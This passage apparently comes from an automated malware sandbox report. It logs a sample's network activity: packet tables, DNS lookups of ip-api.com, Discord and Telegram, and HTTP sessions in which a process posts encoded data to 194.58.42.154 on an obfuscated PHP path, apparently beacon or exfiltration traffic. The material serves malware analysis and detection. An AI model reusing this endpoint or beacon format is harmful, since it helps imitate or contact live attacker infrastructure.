Aug 1, 2024 04:28:57.417978048 CEST	49781	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.425759077 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.425848007 CEST	49781	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.426158905 CEST	49781	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.431152105 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.643682957 CEST	49780	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.649025917 CEST	80	49780	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.649064064 CEST	80	49780	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.784280062 CEST	49781	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:57.794128895 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.794159889 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:57.794187069 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.092801094 CEST	80	49780	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.225663900 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.227440119 CEST	80	49780	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.227819920 CEST	49780	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.364523888 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.364845991 CEST	49781	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.486648083 CEST	49781	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.486767054 CEST	49780	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.487217903 CEST	49782	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.491960049 CEST	80	49781	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.492058039 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.492225885 CEST	49781	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.492227077 CEST	49782	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.492227077 CEST	49782	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.492243052 CEST	80	49780	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.492300034 CEST	49780	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.497360945 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.846752882 CEST	49782	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:58.852150917 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.852181911 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:58.852207899 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:59.289421082 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:59.423705101 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:59.423892021 CEST	49782	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:00.080924034 CEST	49782	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:00.082242966 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:00.086554050 CEST	80	49782	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:00.086769104 CEST	49782	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:00.087205887 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:00.087276936 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:00.088128090 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:00.093127012 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:00.440613031 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:00.445900917 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:00.446052074 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:00.446177959 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:00.898355961 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.127870083 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.241123915 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.241213083 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.241292000 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.485472918 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.491493940 CEST	80	49783	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.491575956 CEST	49783	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.523329973 CEST	49784	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.528567076 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.528800964 CEST	49784	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.528892040 CEST	49784	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.536907911 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.878110886 CEST	49784	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:01.887779951 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.887816906 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:01.887845993 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:02.326628923 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:02.455996037 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:02.457207918 CEST	49784	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:03.903134108 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:03.908230066 CEST	80	49785	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:03.908443928 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:03.908575058 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:03.913575888 CEST	80	49785	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:03.935353041 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:03.940579891 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:03.940821886 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:03.942960978 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:03.947978020 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.252912998 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.258407116 CEST	80	49785	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.258891106 CEST	80	49785	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.300242901 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.305392027 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.307224989 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.307236910 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.701478004 CEST	80	49785	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.723057032 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.815331936 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.815331936 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.831768990 CEST	80	49785	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.850946903 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.924582005 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.927171946 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.968050003 CEST	49784	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.968142986 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.968142986 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.968641996 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.973740101 CEST	80	49784	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.973778009 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.973922968 CEST	49784	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.973923922 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.974018097 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.974083900 CEST	80	49785	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.974112034 CEST	80	49786	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:04.974267960 CEST	49785	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.974267960 CEST	49786	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:04.978884935 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:05.331149101 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:05.336680889 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:05.336698055 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:05.336710930 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:05.793731928 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:05.956015110 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:05.977181911 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:06.143496990 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:06.184015036 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:06.184381008 CEST	49788	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:06.189795971 CEST	80	49787	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:06.189819098 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:06.190007925 CEST	49787	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:06.190057993 CEST	49788	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:06.190058947 CEST	49788	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:06.195214033 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:06.978975058 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:07.127782106 CEST	49788	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:16.986957073 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:16.986974955 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:16.987083912 CEST	49788	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:23.456589937 CEST	49788	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:23.458270073 CEST	49788	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:29:23.461864948 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:23.462398052 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:23.462429047 CEST	80	49788	194.58.42.154	192.168.2.4
Aug 1, 2024 04:29:23.463176966 CEST	80	49788	194.58.42.154	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2024 04:28:05.790946007 CEST	53072	53	192.168.2.4	1.1.1.1
Aug 1, 2024 04:28:05.798007965 CEST	53	53072	1.1.1.1	192.168.2.4
Aug 1, 2024 04:28:08.356617928 CEST	55803	53	192.168.2.4	1.1.1.1
Aug 1, 2024 04:28:08.363800049 CEST	53	55803	1.1.1.1	192.168.2.4
Aug 1, 2024 04:28:09.809014082 CEST	56617	53	192.168.2.4	1.1.1.1
Aug 1, 2024 04:28:09.816160917 CEST	53	56617	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 1, 2024 04:28:05.790946007 CEST	192.168.2.4	1.1.1.1	0x8697	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:08.356617928 CEST	192.168.2.4	1.1.1.1	0x829f	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:09.809014082 CEST	192.168.2.4	1.1.1.1	0x7a68	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 1, 2024 04:28:05.798007965 CEST	1.1.1.1	192.168.2.4	0x8697	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:08.363800049 CEST	1.1.1.1	192.168.2.4	0x829f	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:08.363800049 CEST	1.1.1.1	192.168.2.4	0x829f	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:08.363800049 CEST	1.1.1.1	192.168.2.4	0x829f	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:08.363800049 CEST	1.1.1.1	192.168.2.4	0x829f	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:08.363800049 CEST	1.1.1.1	192.168.2.4	0x829f	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Aug 1, 2024 04:28:09.816160917 CEST	1.1.1.1	192.168.2.4	0x7a68	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

api.telegram.org

194.58.42.154

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:27:45.026078939 CEST	501	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:27:45.406383038 CEST	344	OUT	Data Raw: 00 06 04 00 06 09 01 00 05 06 02 01 02 02 01 05 00 03 05 0b 02 04 03 0b 03 02 0e 05 04 53 00 05 0f 0f 04 01 07 02 03 05 0e 0a 06 03 06 06 04 06 04 07 0e 5b 0c 01 06 07 05 02 04 00 05 52 05 58 02 04 0f 0e 04 00 06 54 0c 00 0f 04 0e 03 0c 06 02 01 Data Ascii: S[RXTTUP\L~N\|`a_wqmLwvlR~]cRs^plKxod^x`Ph}``^o_je~V@{SvL}r}
Aug 1, 2024 04:27:45.473998070 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:27:45.504803896 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:27:46.032799959 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:27:45 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1412 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7d 5d 7a 7d 5a 59 78 62 52 49 7c 07 7c 5a 7d 64 7f 40 68 59 79 41 6d 5d 52 4f 7e 72 6f 59 63 73 7d 42 79 72 7a 5e 75 58 7c 02 6a 5b 78 01 55 4b 72 55 74 4c 63 06 7f 71 66 5e 7f 5e 75 54 78 75 6c 0c 7e 63 73 00 77 61 71 02 77 4f 5b 03 7f 58 7e 48 7e 7c 60 0a 7d 74 64 59 76 76 7b 06 7c 5c 71 03 6a 5e 5b 44 79 67 55 5e 78 49 55 5f 6c 54 64 59 7a 5c 5e 00 7a 70 79 5b 7c 4e 70 01 7b 67 6f 5b 6a 5b 6c 5a 77 62 64 48 7a 51 41 5b 7f 74 74 40 7c 5f 76 54 62 7c 5a 06 7b 6f 64 4b 76 60 6e 08 7a 61 75 4a 7d 7c 5f 5f 7b 61 61 59 75 70 7b 44 75 4f 7c 04 60 58 66 50 7e 5d 7a 06 63 5c 6d 4f 76 66 7f 50 7e 6c 66 58 77 6f 70 04 7e 60 7c 03 78 6f 6f 03 7b 5e 66 01 7c 6e 73 51 77 5e 7c 03 7e 62 5c 09 7e 54 67 0a 7b 54 79 5b 6a 62 71 06 7b 5d 46 51 7f 7f 6c 0a 7e 60 64 0a 7d 49 7e 01 78 43 59 49 79 72 52 03 6b 58 67 01 69 74 7c 54 7f 4e 53 0b 7a 05 68 06 69 5c 64 4b 60 63 53 51 7b 5c 79 07 76 76 56 48 7d 48 5a 4e 7f 76 5b 08 76 72 67 4a 7d 62 75 07 7f 49 62 0c 7b 66 60 08 7c 63 77 02 75 72 6d 4f 77 5f 75 00 7f 4f [TRUNCATED] Data Ascii: VJ}]z}ZYxbRI\|\|Z}d@hYyAm]RO~roYcs}Byrz^uX\|j[xUKrUtLcqf^^uTxul~cswaqwO[X~H~\|`}tdYvv{\|\qj^[DygU^xIU_lTdYz\^zpy[\|Np{go[j[lZwbdHzQA[tt@\|_vTb\|Z{odKv`nzauJ}\|__{aaYup{DuO\|`XfP~]zc\mOvfP~lfXwop~`\|xoo{^f\|nsQw^\|~b\~Tg{Ty[jbq{]FQl~`d}I~xCYIyrRkXgit\|TNSzhi\dK`cSQ{\yvvVH}HZNv[vrgJ}buIb{f`\|cwurmOw_uOP~lt~ggJvakJxLuJ~^SxIhNywt{mYy\tIxcb^^{Y^~bswap\|\|U\|wZ_qNuR`Lz\|pw^nAya}I}RjLxafvM{Iwq^Owa\@`vvb_LuK^RqwB^M\|sxx\|w{`PI}}xtYR}Lf@}mc{}PL}ripR@\|\|@~^x}gvN{}sD{r`~ac}gw@\|NyyM`~blt]eB{aquXd\|vhN~HaOtrsI\|Lu\|wTAxHh@}]{v\awqmJ\|abF~\|VwYDwqgGxbqI}NiJ{IpNxwlxCUzbVzcTL{]NZlYRKj\svX{]~\|wkgR\|bRbo`L{lc\v`uRzO_H}RX_z\y\}b`g{ZL~Jx^~w\uaelBTXtB^h`w_{\|lYoY}[T\|Aww^Oj\TzSYQVq[QqBQsKP~{QiETWtqQ~Z]oa]`X^]QtPkqzPWomQaZ[TBem~Z_\ie[S_~[{Z~uzYhg~lup}skGbav]tXmqv~ol~t{wqx\{avZiwqSJsZldBTqd_VaWVZaNVcoIRp\|z\QBvqlE~lH~Y\|B{\CPbo@VIc[Llz@WpX_z\y~boUTobOXL~JxYW[[zF\f]HSTLco]ESZyQ\|}olPTen@XJpEy[STQtKQnS
Aug 1, 2024 04:27:46.033272982 CEST	405	IN	Data Raw: 46 52 5a 09 4e 68 63 55 48 50 0a 0c 7d 52 06 63 54 7a 59 58 5d 61 55 59 5a 7a 75 7b 5f 6b 62 0b 44 51 7b 60 56 50 63 05 5e 57 5a 6f 5b 51 61 0c 44 6d 5a 76 4c 6e 66 79 05 71 59 04 5e 57 4b 73 6d 52 01 72 4a 70 5f 45 5a 68 04 66 43 51 74 4b 08 6c Data Ascii: FRZNhcUHP}RcTzYX]aUYZzu{_kbDQ{`VPc^WZo[QaDmZvLnfyqY^WKsmRrJp_EZhfCQtKlUMk\|F\aZ[TtSa]yRZPfeZtvx^oaGQ\|n]WdRoTW`HRcYW`b_}]seT^YiagPmgXW`H{ZFQhbO[Ao]DayOV[f@QUeCQp}GbpcZw\yhf~JxYW[[zF\f]HST_[P`_TVd}lc_{SVPm^
Aug 1, 2024 04:27:49.604711056 CEST	477	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 384 Expect: 100-continue
Aug 1, 2024 04:27:49.874025106 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:27:49.876854897 CEST	384	OUT	Data Raw: 58 54 59 51 5f 4a 57 59 5e 5a 5a 56 50 5d 50 5c 55 57 5c 51 54 5d 5a 59 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XTYQ_JWY^ZZVP]P\UW\QT]ZYYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(#&#Z8_9>)!+\?;<%=-W7#(9X $8_3=9^/.]+/
Aug 1, 2024 04:27:50.151701927 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:27:49 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 10 23 35 31 11 23 2e 2f 0c 3a 5c 29 05 28 1d 39 04 2a 3c 3b 02 27 0d 09 1e 2b 13 0a 59 3d 2c 23 01 24 2d 2c 50 34 5a 3d 57 3c 26 2a 46 0c 10 26 02 3e 2d 09 51 26 59 37 57 2e 56 32 1a 31 07 2b 59 35 3f 00 16 34 28 30 1b 3c 2b 3c 54 33 07 0d 0b 2f 2e 0f 01 31 51 3d 02 23 35 2a 54 02 15 27 53 3e 04 29 12 30 32 20 5c 32 3f 24 0e 25 07 31 58 35 3c 29 10 37 29 26 17 24 16 2c 0a 3c 2e 02 56 24 2f 28 13 29 1f 35 56 21 2d 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &#51#./:\)(9<;'+Y=,#$-,P4Z=W<&F&>-Q&Y7W.V21+Y5?4(0<+<T3/.1Q=#5T'S>)02 \2?$%1X5<)7)&$,<.V$/()5V!- P,W5WT
Aug 1, 2024 04:27:52.245501041 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:27:52.513803005 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:27:52.514266968 CEST	2512	OUT	Data Raw: 58 5e 5c 55 5f 45 52 5e 5e 5a 5a 56 50 58 50 5a 55 54 5c 5b 54 5b 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X^\U_ER^^ZZVPXPZUT\[T[ZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&( 5R#$_*0==25; +'9#X,(\6#'3=9^/.]+;
Aug 1, 2024 04:27:52.798106909 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:27:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:27:49.867995977 CEST	477	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 384 Expect: 100-continue
Aug 1, 2024 04:27:50.682379961 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:27:50.868844032 CEST	384	OUT	Data Raw: 58 54 5c 56 5f 47 57 5a 5e 5a 5a 56 50 59 50 5e 55 56 5c 5c 54 5b 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XT\V_GWZ^ZZVPYP^UV\\T[Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%?)#?;*32[)<%!(;]?8$$>6#0V<9%^74?39^/.]+
Aug 1, 2024 04:27:51.156352043 CEST	324	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:27:50 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 53 22 18 21 5a 20 3e 02 1f 2e 03 32 58 2b 0a 29 03 3e 3c 02 13 24 30 20 0f 3f 3d 3f 01 3e 3f 3c 5c 25 2e 02 57 23 2f 3d 12 3c 26 2a 46 0c 10 26 06 28 3d 27 13 26 2f 23 1c 2c 20 03 0b 25 00 1a 07 22 59 2a 1b 37 38 2c 59 3e 3b 20 50 24 17 23 0e 39 00 07 05 32 27 3e 5d 34 25 2a 54 02 15 24 08 29 5b 36 00 24 32 12 5f 25 3c 19 10 32 10 39 5e 20 2c 04 04 20 17 04 5b 27 06 2b 1b 29 2d 38 19 26 59 34 5a 2a 32 26 0b 21 17 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &S"!Z >.2X+)><$0 ?=?>?<\%.W#/=<&F&(='&/#, %"Y78,Y>; P$#92'>]4%T$)[6$2_%<29^ , ['+)-8&Y4Z2&! P*,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:27:53.042762995 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1532 Expect: 100-continue
